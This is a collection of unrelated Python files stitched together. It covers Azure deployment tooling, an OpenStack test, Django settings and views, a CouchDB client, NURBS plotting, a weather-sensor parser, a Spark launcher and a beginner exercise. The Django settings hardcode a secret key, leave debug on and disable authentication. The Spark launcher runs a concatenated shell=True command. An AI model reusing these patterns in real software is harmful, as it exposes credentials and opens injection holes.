info = client.management_groups.get(
self.management_group_id, expand='children', recurse=True)
self._add_subscription_hosts_from_info(info)
def _add_subscription_hosts_from_info(self, info):
if info.type == SUBSCRIPTION_TYPE:
sub_id = info.name # The 'name' field of child info is the subscription id
self.add_subscription_host(
Deployment.sub_name_to_deployment_name(info.display_name),
{
ENV_SUB_ID: sub_id,
ENV_CONTAINER_QUEUE_NAME: 'c7n-{}'.format(info.name[-4:])
},
)
elif info.type == MANAGEMENT_GROUP_TYPE and info.children:
for child in info.children:
self._add_subscription_hosts_from_info(child)
@click.group()
@click.option('--deployment-name', '-d', default='cloud-custodian')
@click.option('--deployment-namespace', '-n', default='cloud-custodian')
@click.option('--helm-values-file', '-v', required=True)
@click.option('--helm-set', '-s', multiple=True)
@click.option('--dry-run/--no-dry-run', default=False)
def cli(deployment_name, deployment_namespace, helm_values_file=None, helm_set=None, dry_run=False):
pass
@cli.command('subscription')
@click.option('--subscription-id', '-i', required=True)
@click.pass_context
class SubscriptionDeploymentCommand(SubscriptionDeployment):
pass
@cli.command('management_group')
@click.option('--management-group-id', '-i', required=True)
@click.pass_context
class ManagementGroupDeploymentCommand(ManagementGroupDeployment):
pass
if __name__ == '__main__':
cli()
|
# Copyright 2013 NEC Corporation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import time
from oslo_log import log as logging
import testtools
from tempest.common.utils import data_utils
from tempest import config
from tempest import exceptions
from tempest.lib import decorators
from tempest.lib import exceptions as lib_exc
from tempest.scenario import manager
from tempest import test
CONF = config.CONF
LOG = logging.getLogger(__name__)
class TestStampPattern(manager.ScenarioTest):
"""The test suite for both snapshoting and attaching of volume
This test is for snapshotting an instance/volume and attaching the volume
created from snapshot to the instance booted from snapshot.
The following is the scenario outline:
1. Boot an instance "instance1"
2. Create a volume "volume1"
3. Attach volume1 to instance1
4. Create a filesystem on volume1
5. Mount volume1
    6. Create a file containing a timestamp on volume1
7. Unmount volume1
8. Detach volume1 from instance1
9. Get a snapshot "snapshot_from_volume" of volume1
10. Get a snapshot "snapshot_from_instance" of instance1
11. Boot an instance "instance2" from snapshot_from_instance
12. Create a volume "volume2" from snapshot_from_volume
13. Attach volume2 to instance2
    14. Check that the file created at step 6 exists in volume2
"""
@classmethod
def skip_checks(cls):
super(TestStampPattern, cls).skip_checks()
if not CONF.volume_feature_enabled.snapshot:
raise cls.skipException("Cinder volume snapshots are disabled")
def _create_volume_snapshot(self, volume):
snapshot_name = data_utils.rand_name('scenario-snapshot')
snapshot = self.snapshots_client.create_snapshot(
volume_id=volume['id'], display_name=snapshot_name)['snapshot']
def cleaner():
self.snapshots_client.delete_snapshot(snapshot['id'])
try:
while self.snapshots_client.show_snapshot(
snapshot['id'])['snapshot']:
time.sleep(1)
except lib_exc.NotFound:
pass
self.addCleanup(cleaner)
self.volumes_client.wait_for_volume_status(volume['id'], 'available')
self.snapshots_client.wait_for_snapshot_status(snapshot['id'],
'available')
self.assertEqual(snapshot_name, snapshot['display_name'])
return snapshot
def _wait_for_volume_available_on_the_system(self, ip_address,
private_key):
ssh = self.get_remote_client(ip_address, private_key=private_key)
def _func():
part = ssh.get_partitions()
LOG.debug("Partitions:%s" % part)
return CONF.compute.volume_device_name in part
if not test.call_until_true(_func,
CONF.compute.build_timeout,
CONF.compute.build_interval):
raise exceptions.TimeoutException
@decorators.skip_because(bug="1205344")
@test.idempotent_id('10fd234a-515c-41e5-b092-8323060598c5')
@testtools.skipUnless(CONF.compute_feature_enabled.snapshot,
'Snapshotting is not available.')
@test.services('compute', 'network', 'volume', 'image')
def test_stamp_pattern(self):
# prepare for booting an instance
keypair = self.create_keypair()
security_group = self._create_security_group()
# boot an instance and create a timestamp file in it
volume = self.create_volume()
server = self.create_server(
image_id=CONF.compute.image_ref,
key_name=keypair['name'],
security_groups=security_group,
wait_until='ACTIVE')
# create and add floating IP to server1
ip_for_server = self.get_server_ip(server)
self.nova_volume_attach(server, volume)
self._wait_for_volume_available_on_the_system(ip_for_server,
keypair['private_key'])
timestamp = self.create_timestamp(ip_for_server,
CONF.compute.volume_device_name,
private_key=keypair['private_key'])
self.nova_volume_detach(server, volume)
# snapshot the volume
volume_snapshot = self._create_volume_snapshot(volume)
# snapshot the instance
snapshot_image = self.create_server_snapshot(server=server)
# create second volume from the snapshot(volume2)
volume_from_snapshot = self.create_volume(
snapshot_id=volume_snapshot['id'])
# boot second instance from the snapshot(instance2)
server_from_snapshot = self.create_server(
image_id=snapshot_image['id'],
key_name=keypair['name'],
security_groups=security_group)
# create and add floating IP to server_from_snapshot
ip_for_snapshot = self.get_server_ip(server_from_snapshot)
# attach volume2 to instance2
self.nova_volume_attach(server_from_snapshot, volume_from_snapshot)
self._wait_for_volume_available_on_the_system(ip_for_snapshot,
keypair['private_key'])
# check the existence of the timestamp file in the volume2
timestamp2 = self.get_timestamp(ip_for_snapshot,
CONF.compute.volume_device_name,
private_key=keypair['private_key'])
self.assertEqual(timestamp, timestamp2)
|
"""
Django settings for pedevops project.
Generated by 'django-admin startproject' using Django 1.8.4.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '2%3tp+p$cu2p)y_%!+u4*mbi5153-6k*jz!s#@t8)6&w!qa*62'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
# 'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'login',
'devops',
'zabbix',
'pems',
'coderelease',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
# 'django.contrib.auth.middleware.AuthenticationMiddleware',
# 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'pedevops.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['/data/web/Django/pedevops/templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
# 'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'pedevops.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'pedevops',
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = ['/data/web/Django/pedevops/static']
FILE_CHARSET='utf-8'
DEFAULT_CHARSET='utf-8'
#SESSION_COOKIE_AGE = 43200
SESSION_EXPIRE_AT_BROWSER_CLOSE = True
|
import shutil
import subprocess
import sys
from porcupine.plugins import python_venv
# This test is slow, because making venvs is slow
def test_venv_setting(tmp_path):
assert python_venv.get_venv(tmp_path) is None
subprocess.run([sys.executable, "-m", "venv", "env2"], cwd=tmp_path, check=True)
assert python_venv.get_venv(tmp_path) == tmp_path / "env2"
# Never change venv implicitly, as new venvs are created
subprocess.run([sys.executable, "-m", "venv", "env1"], cwd=tmp_path, check=True)
assert python_venv.get_venv(tmp_path) == tmp_path / "env2"
subprocess.run([sys.executable, "-m", "venv", "env3"], cwd=tmp_path, check=True)
assert python_venv.get_venv(tmp_path) == tmp_path / "env2"
for env in ["env1", "env2", "env1", "env1", "env2", "env2"]:
python_venv.set_venv(tmp_path, tmp_path / env)
assert python_venv.get_venv(tmp_path) == tmp_path / env
def test_venv_becomes_invalid(tmp_path):
subprocess.run([sys.executable, "-m", "venv", "env"], cwd=tmp_path, check=True)
assert python_venv.get_venv(tmp_path) == tmp_path / "env"
shutil.rmtree(tmp_path / "env")
assert python_venv.get_venv(tmp_path) is None
|
# -*- coding: utf-8 -*-
#
# This file is part of couchapp released under the Apache 2 license.
# See the NOTICE for more information.
from __future__ import with_statement
import base64
import itertools
import re
import types
try:
import desktopcouch
except ImportError:
desktopcouch = None
from restkit import Resource, HttpResponse, ResourceError, request
from restkit import util
from restkit.util import oauth2 as oauth
from restkit.filters.oauth2 import OAuthFilter
from couchapp import __version__
from couchapp.errors import ResourceNotFound, ResourceConflict,\
    PreconditionFailed, RequestFailed, BulkSaveError, Unauthorized, \
    InvalidAttachment, AppError  # AppError is raised when desktopcouch is unavailable
from couchapp.util import json
USER_AGENT = "couchapp/%s" % __version__
aliases = {
'id': '_id',
'rev': '_rev'
}
UNKNOWN_VERSION = tuple()
class CouchdbResponse(HttpResponse):
@property
def json_body(self):
try:
return json.loads(self.body_string())
except ValueError:
return self.body
class CouchdbResource(Resource):
def __init__(self, uri="http://127.0.0.1:5984", **client_opts):
"""Constructor for a `CouchdbResource` object.
CouchdbResource represent an HTTP resource to CouchDB.
@param uri: str, full uri to the server.
"""
client_opts['response_class'] = CouchdbResponse
Resource.__init__(self, uri=uri, **client_opts)
self.safe = ":/%"
def copy(self, path=None, headers=None, **params):
""" add copy to HTTP verbs """
return self.request('COPY', path=path, headers=headers, **params)
def request(self, method, path=None, payload=None, headers=None, **params):
""" Perform HTTP call to the couchdb server and manage
JSON conversions, support GET, POST, PUT and DELETE.
Usage example, get infos of a couchdb server on
http://127.0.0.1:5984 :
            from couchapp.client import CouchdbResource
            resource = CouchdbResource()
            infos = resource.request('GET')
@param method: str, the HTTP action to be performed:
'GET', 'HEAD', 'POST', 'PUT', or 'DELETE'
@param path: str or list, path to add to the uri
        @param payload: str or any object that can be
        converted to JSON.
@param headers: dict, optional headers that will
be added to HTTP request.
        @param raw: boolean, return the raw Response object
        @param params: Optional parameters added to the request.
        Parameters are for example the parameters for a view. See
`CouchDB View API reference
<http://wiki.apache.org/couchdb/HTTP_view_API>`_ for example.
        @return: a `CouchdbResponse` object; use its `json_body` property
        to get the decoded body (often a dict).
"""
headers = headers or {}
headers.setdefault('Accept', 'application/json')
headers.setdefault('User-Agent', USER_AGENT)
try:
return Resource.request(self, method, path=path,
payload=payload, headers=headers, **params)
except ResourceError, e:
msg = getattr(e, 'msg', '')
if e.response and msg:
if e.response.headers.get('content-type') == 'application/json':
try:
msg = json.loads(str(msg))
except ValueError:
pass
if type(msg) is dict:
error = msg.get('reason')
else:
error = msg
if e.status_int == 404:
raise ResourceNotFound(error, http_code=404,
response=e.response)
elif e.status_int == 409:
raise ResourceConflict(error, http_code=409,
response=e.response)
elif e.status_int == 412:
raise PreconditionFailed(error, http_code=412,
response=e.response)
elif e.status_int in (401, 403):
raise Unauthorized(e)
else:
raise RequestFailed(str(e))
except Exception, e:
raise RequestFailed("unknown error [%s]" % str(e))
def couchdb_version(server_uri):
res = CouchdbResource(server_uri)
try:
resp = res.get()
except Exception, e:
return UNKNOWN_VERSION
version = resp.json_body["version"]
t = []
for p in version.split("."):
try:
t.append(int(p))
except ValueError:
continue
return tuple(t)
class Uuids(CouchdbResource):
def __init__(self, uri, max_uuids=1000, **client_opts):
CouchdbResource.__init__(self, uri=uri, **client_opts)
self._uuids = []
self.max_uuids = max_uuids
def next(self):
if not self._uuids:
self.fetch_uuids()
self._uuids, res = self._uuids[:-1], self._uuids[-1]
return res
def __iter__(self):
return self
def fetch_uuids(self):
count = self.max_uuids - len(self._uuids)
resp = self.get('/_uuids', count=count)
self._uuids += resp.json_body['uuids']
class Database(CouchdbResource):
""" Object that abstract access to a CouchDB database
A Database object can act as a Dict object.
"""
def __init__(self, uri, **client_opts):
self.raw_uri = uri
if uri.startswith("desktopcouch://"):
if not desktopcouch:
raise AppError("Desktopcouch isn't available on this"+
"machine. You can't access to %s" % db_string)
uri = "http://localhost:%s/%s" % (
desktopcouch.find_port(), uri[15:])
ctx = desktopcouch.local_files.DEFAULT_CONTEXT
oauth_tokens = desktopcouch.local_files.get_oauth_tokens(ctx)
consumer = oauth.Consumer(oauth_tokens["consumer_key"],
oauth_tokens["consumer_secret"])
token = oauth.Token(oauth_tokens["token"],
oauth_tokens["token_secret"])
oauth_filter = OAuthFilter("*", consumer, token)
filters = client_opts.get("filters") or []
filters.append(oauth_filter)
client_opts["filters"] = filters
CouchdbResource.__init__(self, uri=uri, **client_opts)
self.server_uri, self.dbname = uri.rsplit('/', 1)
self.uuids = Uuids(self.server_uri, **client_opts)
self.version = couchdb_version(self.server_uri)
if self.uri.endswith("/"):
self.uri = self.uri[:-1]
# create the db
try:
self.head()
except ResourceNotFound:
self.put()
def info(self):
"""
Get database information
@param _raw_json: return raw json instead deserializing it
@return: dict
"""
return self.get().json_body
def all_docs(self, **params):
"""
return all_docs
"""
return self.view('_all_docs', **params)
def open_doc(self, docid, wrapper=None, **params):
"""Open document from database
Args:
@param docid: str, document id to retrieve
@param rev: if specified, allows you to retrieve
a specific revision of document
@param wrapper: callable. function that takes dict as a param.
Used to wrap an object.
@params params: Other params to pass to the uri (or headers)
@return: dict, representation of CouchDB document as
a dict.
"""
resp = self.get(escape_docid(docid), **params)
if wrapper is not None:
if not callable(wrapper):
raise TypeError("wrapper isn't a callable")
return wrapper(resp.json_body)
return resp.json_body
def save_doc(self, doc, encode=False, force_update=False, **params):
""" Save a document. It will use the `_id` member of the document
or request a new uuid from CouchDB. IDs are attached to
documents on the client side because POST has the curious property of
being automatically retried by proxies in the event of network
segmentation and lost responses.
@param doc: dict. doc is updated
with doc '_id' and '_rev' properties returned
by CouchDB server when you save.
        @param force_update: boolean, if there is a conflict, try to update
with latest revision
@param encode: Encode attachments if needed (depends on couchdb version)
@return: new doc with updated revision an id
"""
if '_attachments' in doc and encode:
doc['_attachments'] = encode_attachments(doc['_attachments'])
headers = params.get('headers', {})
headers.setdefault('Content-Type', 'application/json')
params['headers'] = headers
if '_id' in doc:
docid = escape_docid(doc['_id'])
try:
resp = self.put(docid, payload=json.dumps(doc), **params)
except ResourceConflict:
if not force_update:
raise
rev = self.last_rev(doc['_id'])
doc['_rev'] = rev
resp = self.put(docid, payload=json.dumps(doc), **params)
else:
json_doc = json.dumps(doc)
try:
doc['_id'] = self.uuids.next()
resp = self.put(doc['_id'], payload=json_doc, **params)
except ResourceConflict:
resp = self.post(payload=json_doc, **params)
json_res = resp.json_body
doc1 = {}
for a, n in aliases.items():
if a in json_res:
doc1[n] = json_res[a]
doc.update(doc1)
return doc
def last_rev(self, docid):
""" Get last revision from docid (the '_rev' member)
@param docid: str, undecoded document id.
@return rev: str, the last revision of document.
"""
r = self.head(escape_docid(docid))
return r.headers['etag'].strip('"')
def delete_doc(self, id_or_doc):
""" Delete a document
@param id_or_doc: docid string or document dict
"""
if isinstance(id_or_doc, types.StringType):
docid = id_or_doc
resp = self.delete(escape_docid(id_or_doc),
rev=self.last_rev(id_or_doc))
else:
docid = id_or_doc.get('_id')
if not docid:
raise ValueError('Not valid doc to delete (no doc id)')
rev = id_or_doc.get('_rev', self.last_rev(docid))
resp = self.delete(escape_docid(docid), rev=rev)
return resp.json_body
def save_docs(self, docs, all_or_nothing=False, use_uuids=True):
""" Bulk save. Modify Multiple Documents With a Single Request
@param docs: list of docs
        @param use_uuids: add an _id to docs that do not already have one set.
@param all_or_nothing: In the case of a power failure, when the database
restarts either all the changes will have been saved or none of them.
        However, it does not do conflict checking, so the documents will be
        committed even if this creates conflicts.
        @return: doc lists updated with new revisions, or raise a BulkSaveError
        exception. You can access the created docs and the docs in error as properties
of this exception.
"""
def is_id(doc):
return '_id' in doc
if use_uuids:
noids = []
for k, g in itertools.groupby(docs, is_id):
if not k:
                    noids.extend(g)  # collect every run of docs that lack an _id
for doc in noids:
nextid = self.uuids.next()
if nextid:
doc['_id'] = nextid
payload = { "docs": docs }
if all_or_nothing:
payload["all-or-nothing"] = True
# update docs
res = self.post('/_bulk_docs', payload=json.dumps(payload),
headers={'Content-Type': 'application/json'})
json_res = res.json_body
errors = []
for i, r in enumerate(json_res):
if 'error' in r:
doc1 = docs[i]
doc1.update({'_id': r['id'],
'_rev': r['rev']})
errors.append(doc1)
else:
docs[i].update({'_id': r['id'],
'_rev': r['rev']})
if errors:
raise BulkSaveError(docs, errors)
def delete_docs(self, docs, all_or_nothing=False, use_uuids=True):
""" multiple doc delete."""
for doc in docs:
doc['_deleted'] = True
return self.save_docs(docs, all_or_nothing=all_or_nothing,
use_uuids=use_uuids)
def fetch_attachment(self, id_or_doc, name, headers=None):
""" get attachment in a document
@param id_or_doc: str or dict, doc id or document dict
        @param name: name of the attachment
        @param headers: optional headers (like Range)
@return: `couchdbkit.resource.CouchDBResponse` object
"""
if isinstance(id_or_doc, basestring):
docid = id_or_doc
else:
docid = id_or_doc['_id']
return self.get("%s/%s" % (escape_docid(docid), name), headers=headers)
def put_attachment(self, doc, content=None, name=None, headers=None):
""" Add attachement to a document. All attachments are streamed.
@param doc: dict, document object
@param content: string, iterator, fileobj
@param name: name or attachment (file name).
@param headers: optionnal headers like `Content-Length`
or `Content-Type`
@return: updated document object
"""
        headers = headers or {}
content = content or ""
if name is None:
if hasattr(content, "name"):
name = content.name
else:
                raise InvalidAttachment(
                    'You should provide a valid attachment name')
name = util.url_quote(name, safe="")
res = self.put("%s/%s" % (escape_docid(doc['_id']), name),
payload=content, headers=headers, rev=doc['_rev'])
json_res = res.json_body
        if 'ok' in json_res:
            doc.update(self.open_doc(doc['_id']))
            return doc
        return False
def delete_attachment(self, doc, name):
""" delete attachement to the document
@param doc: dict, document object in python
@param name: name of attachement
@return: updated document object
"""
name = util.url_quote(name, safe="")
self.delete("%s/%s" % (escape_docid(doc['_id']), name),
rev=doc['_rev']).json_body
return doc.update(self.open_doc(doc['_id']))
def view(self, view_name, **params):
try:
dname, vname = view_name.split("/")
path = "/_design/%s/_view/%s" % (dname, vname)
except ValueError:
path = view_name
if "keys" in params:
keys = params.pop("keys")
            return self.post(path, payload=json.dumps({"keys": keys}),
                             **params).json_body
return self.get(path, **params).json_body
def encode_params(params):
""" encode parameters in json if needed """
_params = {}
if params:
for name, value in params.items():
if value is None:
continue
if name in ('key', 'startkey', 'endkey') \
or not isinstance(value, basestring):
value = json.dumps(value).encode('utf-8')
_params[name] = value
return _params
def escape_docid(docid):
if docid.startswith('/'):
docid = docid[1:]
if docid.startswith('_design'):
docid = '_design/%s' % util.url_quote(docid[8:], safe='')
else:
docid = util.url_quote(docid, safe='')
return docid
def encode_attachments(attachments):
for k, v in attachments.iteritems():
if v.get('stub', False):
continue
else:
            re_sp = re.compile(r'\s')
v['data'] = re_sp.sub('', base64.b64encode(v['data']))
return attachments
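# A minimal usage sketch of the client methods above (illustrative only; the
# database URL and the `Database` wrapper class are assumptions, not shown here):
#
#     db = Database('http://127.0.0.1:5984/testdb')
#     doc = {'type': 'person', 'name': 'Ada'}
#     db.save_doc(doc)                      # doc now carries '_id' and '_rev'
#     rev = db.last_rev(doc['_id'])
#     db.save_docs([{'n': 1}, {'n': 2}])    # bulk save; missing ids come from uuids
#     db.delete_doc(doc)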
|
# -*- coding: utf-8 -*-
from nurbs import Surface as ns
from nurbs import utilities as utils
from matplotlib import pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
# Create a NURBS surface instance
surf = ns.Surface()
# Set up the NURBS surface
surf.read_ctrlpts("data/CP_Surface2.txt")
surf.degree_u = 3
surf.degree_v = 3
surf.knotvector_u = utils.autogen_knotvector(surf.degree_u, 6)
surf.knotvector_v = utils.autogen_knotvector(surf.degree_v, 6)
# Evaluate surface
surf.evaluate_rational()
# Calculate 1st order surface derivative at the given u and v
u = 0.2
v = 0.9
surftan = surf.tangent(u, v)
print("* Surface point at u = %.2f and v = %.2f is (%.2f, %.2f, %.2f)" % (u, v, surftan[0][0], surftan[0][1], surftan[0][2]))
print("* First derivative w.r.t. u is (%.2f, %.2f, %.2f)" % (surftan[1][0], surftan[1][1], surftan[1][2]))
print("* First derivative w.r.t. v is (%.2f, %.2f, %.2f)\n" % (surftan[2][0], surftan[2][1], surftan[2][2]))
# Calculate normal at the given u and v
norm = surf.normal(u, v)
print("* Normal at u = %.2f and v = %.2f is [%.1f, %.1f, %.1f]\n" % (u, v, norm[0], norm[1], norm[2]))
# Arrange calculated surface data for plotting
surfpts_x = []
surfpts_y = []
surfpts_z = []
for spt in surf.surfpts:
surfpts_x.append(spt[0])
surfpts_y.append(spt[1])
surfpts_z.append(spt[2])
# Plot using Matplotlib
fig = plt.figure(figsize=(10.67, 8), dpi=96)
ax = fig.gca(projection='3d')
#surfplt = ax.scatter(surfpts_x, surfpts_y, surfpts_z, c="green", s=10, depthshade=True) # 3D Scatter plot
surfplt = ax.plot_trisurf(surfpts_x, surfpts_y, surfpts_z, cmap=plt.cm.winter) # 3D Tri-Surface plot
ax.set_xlim(-25, 25)
ax.set_ylim(-25, 25)
ax.set_zlim(-15, 15)
fig.show()
print("End of NURBS-Python Example")
|
# -*- coding: iso-8859-15 -*-
'''
Created on 12.03.2015
@author: buchfink
'''
import math
POLYNOMIAL = 0x1021
PRESET = 0
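# 0x1021 is the CRC-16/CCITT generator polynomial (x^16 + x^12 + x^5 + 1);
# PRESET = 0 is the initial shift-register value used by crc() below.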
def _initial(c):
crc = 0
c = c << 8
for _ in range(8):
if (crc ^ c) & 0x8000:
crc = (crc << 1) ^ POLYNOMIAL
else:
crc = crc << 1
c = c << 1
return crc
_tab = [ _initial(i) for i in range(256) ]
def _update_crc(crc, c):
cc = 0xff & c
tmp = (crc >> 8) ^ cc
crc = (crc << 8) ^ _tab[tmp & 0xff]
crc = crc & 0xffff
return crc
# Calculates the crc
def crc(data):
crc = PRESET
for idx in range(2, 10):
crc = _update_crc(crc, int(data[idx], 16))
return crc
# Check line for crc
def check(line):
return crc(line.split()) == 0
# formats the line
def formatData(line):
data = line.split()
if len(data) == 0 or data[0] != 'I':
return line
value = ""
for idx in range(len(data)):
if idx > 0:
value += " "
if idx >= 2 and idx < 10:
value += ("0" + data[idx]) if len(data[idx]) == 1 else data[idx]
elif idx == 10:
value += (" " + data[idx])
else:
value += data[idx]
return value
# returns the sensor id
def sensor(line):
if len(line) == 0:
return ' '
    elif line[0] != 'I':
return line[0]
elif len(line) > 6:
if line[6] == '2':
return 'V'
elif line[6] == '5':
return 'R'
elif line[6] == '7':
return 'S'
elif line[6] == '8':
return 'T'
elif line[6] == '9':
return 'G'
elif line[6] == 'A':
return 'H'
elif line[6] == 'E':
return 'N'
else:
return 'I'
else:
return 'I'
# Parses values from line
def description(line):
description = "unknown"
data = line.split()
# Pressure
if data[0] == 'A' and len(data) == 7:
p = round(float(data[4]) / 100.0, 2)
description = "p=" + str(p) + "hPa"
elif data[0] == 'B' and len(data) == 7:
p = round(math.pow(math.pow(float(data[4])/100.0, 0.1902614) + 8.417168e-05 * 310.17, 5.255927), 1)
description = "p=" + str(p) + "hPa"
elif data[0] == 'I' and crc(data) != 0:
return "invalid crc"
elif data[0] == 'I':
header = int(data[2], 16) >> 4
windSpeed = int(round(int(data[3], 16) * 1.609344, 0))
windDirections = (int(data[4], 16) << 2) | (int(data[6], 16) & 0x02)
windDirections = 360 if windDirections > 1024 or windDirections <= 0 else int(round(windDirections * 360.0 / 1024.0))
windData = " w(" + str(windSpeed) + "km/h, " + str(windDirections) + "°)"
# akku voltage
if header == 0x2:
voltage = round(((int(data[5], 16) << 2) + ((int(data[6], 16) & 0xC0) >> 6)) / 100.0, 1)
description = "v=" + str(voltage) + "V"
elif header == 0x3:
description = "unknown" # not implemented
# rain rate
elif header == 0x5:
rr = 0
rr1 = int(data[5], 16)
rr2 = int(data[6], 16)
if rr1 != 0xff:
if (rr2 & 0x40) == 0:
rr = round(11520.0/(((rr2 & 0x30) << 4) | rr1), 1)
elif (rr2 & 0x40) == 0x40:
rr = round(11520.0/(((rr2 & 0x30) << 8) | (rr1 << 4)), 1)
description = "rr=" + str(rr) + "mm/h"
# solar radiation
elif header == 0x7:
sol = (int(data[5], 16) << 2) + ((int(data[6], 16) & 0xC0) >> 6)
description = "sol=" + str(sol)
# temperature
elif header == 0x8:
value = int(data[5], 16) * 256 + int(data[6], 16)
value = value - 65536 if value > 32767 else value
temperature = round((value/160.0 - 32.0)*5.0/9.0, 1)
description = "t=" + str(temperature) + "°C"
# gust speed
elif header == 0x9:
gustSpeed = int(round(int(data[5], 16) * 1.609344, 0))
description = "g=" + str(gustSpeed) + "km/h"
# humidity
elif header == 0xA:
value = ((int(data[6], 16) >> 4) << 8) + int(data[5], 16)
humidity = int(round(value * 1.01 / 10.0, 0))
humidity = 100 if humidity > 100 else humidity
description = "h=" + str(humidity) + "%"
# rain ticks
elif header == 0xE:
ticks = value = int(data[5], 16) & 0x7f
description = "r=" + str(ticks)
description = "%-12s%s" % (description,windData)
return description
|
import atexit
import os
import platform
import subprocess
import time
import sys
import signal
from colorama import Fore
from rtxlib import info, error
from rtxlib.preprocessors.PreProcessor import PreProcessor
class SparkPreProcessor(PreProcessor):
""" Implements a preprocessor in spark """
def __init__(self, wf, p):
try:
self.submit_mode = p["submit_mode"]
self.job_file = p["job_file"]
self.job_class = p["job_class"]
info("> PreProcessor | Spark | Mode: " + str(self.submit_mode) + " | Args: " + str(
self.job_class), Fore.CYAN)
except KeyError as e:
error("configuration.spark was incomplete: " + str(e))
exit(1)
spark_home = os.environ.get("SPARK_HOME")
spark_bin = "/bin/spark-submit"
# now we start the spark to run the job in
# http://stackoverflow.com/questions/13243807/popen-waiting-for-child-process-even-when-the-immediate-child-has-terminated/13256908#13256908
# set system/version dependent "start_new_session" analogs
kwargs = {}
if platform.system() == 'Windows':
CREATE_NEW_PROCESS_GROUP = 0x00000200 # note: could get it from subprocess
DETACHED_PROCESS = 0x00000008 # 0x8 | 0x200 == 0x208
kwargs.update(creationflags=DETACHED_PROCESS | CREATE_NEW_PROCESS_GROUP)
elif sys.version_info < (3, 2): # assume posix
kwargs.update(preexec_fn=os.setsid)
else: # Python 3.2+ and Unix
kwargs.update(start_new_session=True)
# starting a subprocess to allow termination of spark after we are done
self.process = subprocess.Popen(spark_home + spark_bin + ' --class ' + self.job_class + \
' ./' + wf.folder + '/' + self.job_file, stdout=subprocess.PIPE, shell=True,
**kwargs)
# register a shutdown callback on this thread
atexit.register(self.shutdown)
# wait for some time to get spark time to boot up
time.sleep(10)
def shutdown(self):
""" this is called after the reads has been stopped """
try:
# first try to send a sigterm to the PID
os.killpg(os.getpgid(self.process.pid), signal.SIGTERM)
except:
pass
try:
# alternative try a normal process kill
self.process.kill()
except:
pass
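# A usage sketch (hypothetical workflow object and config dict; the keys mirror
# the ones read in __init__ above):
#
#     pre = SparkPreProcessor(wf, {"submit_mode": "client",
#                                  "job_file": "preprocess.jar",
#                                  "job_class": "org.example.PreProcess"})
#     ...  # run the experiment
#     pre.shutdown()   # also registered via atexit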
|
from django.contrib.auth.decorators import login_required
from django.http import Http404
from django.shortcuts import render, get_list_or_404
from django.db.models import Q
from .models import Entry
@login_required
def overview(request, category="Allgemein"):
entries = Entry.objects.all().order_by('-created')[:5]
return render(request, 'blog/list.html', {'entries': entries})
def year(request, year):
entries = Entry.objects.filter(created__year=year).order_by('-created')
return render(request, 'blog/list.html', {'entries': entries})
def month(request, year, month):
entries = get_list_or_404(Entry.objects.order_by('-created'), created__year=year, created__month=month)
return render(request, 'blog/list.html', {'entries': entries})
def day(request, year, month, day):
entries = get_list_or_404(Entry.objects.order_by('-created'), created__year=year, created__month=month, created__day=day)
return render(request, 'blog/list.html', {'entries': entries})
def tag(request, tag):
    # filter() never raises DoesNotExist, so check for an empty queryset instead
    entries = Entry.objects.filter(Q(tags=tag)).order_by('-created')
    if not entries:
        raise Http404("Dieser Beitrag konnte leider nicht gefunden werden.")
return render(request, 'blog/list.html', {'entries': entries})
|
#!/usr/bin/env python3
#Create a list that contains “Apples”, “Pears”, “Oranges” and “Peaches”.
fruit = ['Apples', 'Pears', 'Oranges', 'Peaches']
#Display the list.
print(fruit)
#Ask the user for another fruit and add it to the end of the list.
new_fruit = input("Enter another Fruit: ")
fruit.append(new_fruit)
#Display the list.
print(fruit)
#Ask the user for a number and display the number back to the user and
#the fruit corresponding to that number (on a 1-is-first basis).
num = int(input("Enter a number: "))
print('You Entered', num, 'which is', fruit[num - 1], 'in the list')
#Add another fruit to the beginning of the list using “+” and display the list.
new_fruit1 = input("Enter another Fruit: ")
fruit = [new_fruit1] + fruit
print(fruit)
#Add another fruit to the beginning of the list using insert() and display the list.
new_fruit2 = input("Enter another Fruit: ")
fruit.insert(0,new_fruit2)
print(fruit)
#Display all the fruits that begin with “P”, using a for loop.
length = len(fruit)
for i in range (0,length):
#print(fruit[i])
if fruit[i][0]=='p' or fruit[i][0]=='P':
print (fruit[i])
"""part two of lab"""
#Display the list.
print (fruit)
#Remove the last fruit from the list.
del fruit[-1]
#Display the list.
print(fruit)
